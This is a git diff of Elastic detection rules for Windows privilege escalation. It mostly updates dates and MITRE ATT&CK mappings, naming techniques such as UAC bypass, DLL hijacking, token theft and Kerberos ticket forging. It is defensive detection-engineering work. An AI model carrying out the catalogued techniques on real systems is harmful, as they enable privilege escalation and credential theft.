"2026/03/24" [rule] author = ["Elastic"] @@ -113,51 +113,41 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" - - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml index b68b5bdb6c1..b86726f75eb 100644 --- a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml +++ b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/23" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -61,27 +61,44 @@ event.code:5137 and host.os.type:"windows" and winlog.event_data.ObjectClass:"ms [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" + +[[rule.threat.technique.subtechnique]] +id = "T1136.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1136/002/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] diff --git a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml index 45a02549dbd..7f8f269e82d 100644 --- a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml +++ b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,14 +82,39 @@ any where host.os.type == "windows" and event.category : ("library", "process") [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_driver_newterm_imphash.toml b/rules/windows/privilege_escalation_driver_newterm_imphash.toml index cec1e42a855..1c167c67958 100644 --- a/rules/windows/privilege_escalation_driver_newterm_imphash.toml +++ b/rules/windows/privilege_escalation_driver_newterm_imphash.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/19" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -118,34 +118,44 @@ event.category:"driver" and host.os.type:windows and event.action:"load" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["dll.pe.original_file_name", "dll.code_signature.subject_name"] diff --git a/rules/windows/privilege_escalation_expired_driver_loaded.toml b/rules/windows/privilege_escalation_expired_driver_loaded.toml index d96ccf10bfe..cf2760676b2 100644 --- a/rules/windows/privilege_escalation_expired_driver_loaded.toml +++ b/rules/windows/privilege_escalation_expired_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,31 +75,41 @@ In Windows environments, drivers facilitate communication between the OS and har [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.002" +name = "Code Signing" +reference = "https://attack.mitre.org/techniques/T1553/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_exploit_cve_202238028.toml b/rules/windows/privilege_escalation_exploit_cve_202238028.toml index 7ce5473206a..4d153d83157 100644 --- a/rules/windows/privilege_escalation_exploit_cve_202238028.toml +++ b/rules/windows/privilege_escalation_exploit_cve_202238028.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,26 +102,36 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.010" +name = "Services File Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/010/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml index 83c8fad1aea..447985003d7 100644 --- a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml +++ b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,36 +90,46 @@ file where host.os.type == "windows" and event.type != "deletion" and event.acti [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/privilege_escalation_group_policy_iniscript.toml b/rules/windows/privilege_escalation_group_policy_iniscript.toml index 1c705e82d44..bb2e22b742f 100644 --- a/rules/windows/privilege_escalation_group_policy_iniscript.toml +++ b/rules/windows/privilege_escalation_group_policy_iniscript.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/08" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -121,24 +121,36 @@ any where host.os.type == "windows" and event.code in ("5136", "5145") and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.001" name = "Group Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/001/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_installertakeover.toml b/rules/windows/privilege_escalation_installertakeover.toml index 52bf1177ba3..70c6969235e 100644 --- a/rules/windows/privilege_escalation_installertakeover.toml +++ b/rules/windows/privilege_escalation_installertakeover.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -143,14 +143,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml index 337b065f9c5..d0e2f4e4fde 100644 --- a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml +++ b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,31 +89,36 @@ sequence by winlog.computer_name with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml index 24dcc87b0fe..c66cc222bb1 100644 --- a/rules/windows/privilege_escalation_lsa_auth_package.toml +++ b/rules/windows/privilege_escalation_lsa_auth_package.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,36 +79,18 @@ The Local Security Authority (LSA) in Windows manages authentication and securit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.002" -name = "Authentication Package" -reference = "https://attack.mitre.org/techniques/T1547/002/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/privilege_escalation_named_pipe_impersonation.toml b/rules/windows/privilege_escalation_named_pipe_impersonation.toml index 17355c1cbf2..2cfed3e6651 100644 --- a/rules/windows/privilege_escalation_named_pipe_impersonation.toml +++ b/rules/windows/privilege_escalation_named_pipe_impersonation.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -135,14 +135,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_persistence_phantom_dll.toml b/rules/windows/privilege_escalation_persistence_phantom_dll.toml index 4cc497eaafe..ac568a9852b 100644 --- a/rules/windows/privilege_escalation_persistence_phantom_dll.toml +++ b/rules/windows/privilege_escalation_persistence_phantom_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/01/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -151,53 +151,36 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml index e4d788cb975..b81fb1bf61d 100644 --- a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml +++ b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/02/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,10 +83,12 @@ Port monitors and print processors are integral to Windows printing, managing da [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.010" name = "Port Monitors" @@ -97,31 +99,7 @@ id = "T1547.012" name = "Print Processors" reference = "https://attack.mitre.org/techniques/T1547/012/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.010" -name = "Port Monitors" -reference = "https://attack.mitre.org/techniques/T1547/010/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.012" -name = "Print Processors" -reference = "https://attack.mitre.org/techniques/T1547/012/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_posh_token_impersonation.toml b/rules/windows/privilege_escalation_posh_token_impersonation.toml index 0d2a820a60c..0662fe27d5b 100644 --- a/rules/windows/privilege_escalation_posh_token_impersonation.toml +++ b/rules/windows/privilege_escalation_posh_token_impersonation.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/17" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -162,44 +162,49 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.001" name = "Token Impersonation/Theft" reference = "https://attack.mitre.org/techniques/T1134/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml b/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml index 020105af031..e1aae601bad 100644 --- a/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml +++ b/rules/windows/privilege_escalation_printspooler_registry_copyfiles.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/26" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,14 +95,31 @@ sequence by host.id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml b/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml index b425a85e9c6..5209db6b7d0 100644 --- a/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml +++ b/rules/windows/privilege_escalation_printspooler_service_suspicious_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -138,17 +138,26 @@ value = "?:\\\\Windows\\\\system32\\\\spool\\\\{????????-????-????-????-???????? [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.name"] diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml index 75067c258a1..1f6466d2994 100644 --- a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml +++ b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/06" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,14 +91,31 @@ file where host.os.type == "windows" and event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml index c415ada0e36..7b6d04f8e88 100644 --- a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml +++ b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/05" integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/10/07" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -135,46 +135,59 @@ registry where host.os.type == "windows" and event.type == "change" and process. [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.011" name = "Services Registry Permissions Weakness" reference = "https://attack.mitre.org/techniques/T1574/011/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml index e411a855b25..265e4436435 100644 --- a/rules/windows/privilege_escalation_rogue_windir_environment_var.toml +++ b/rules/windows/privilege_escalation_rogue_windir_environment_var.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/26" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,19 +92,31 @@ registry.path : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.007" name = "Path Interception by PATH Environment Variable" reference = "https://attack.mitre.org/techniques/T1574/007/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml index 2f73a8e24e7..8fc20711803 100644 --- a/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml +++ b/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/12" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,6 +84,7 @@ iam where host.os.type == "windows" and event.action == 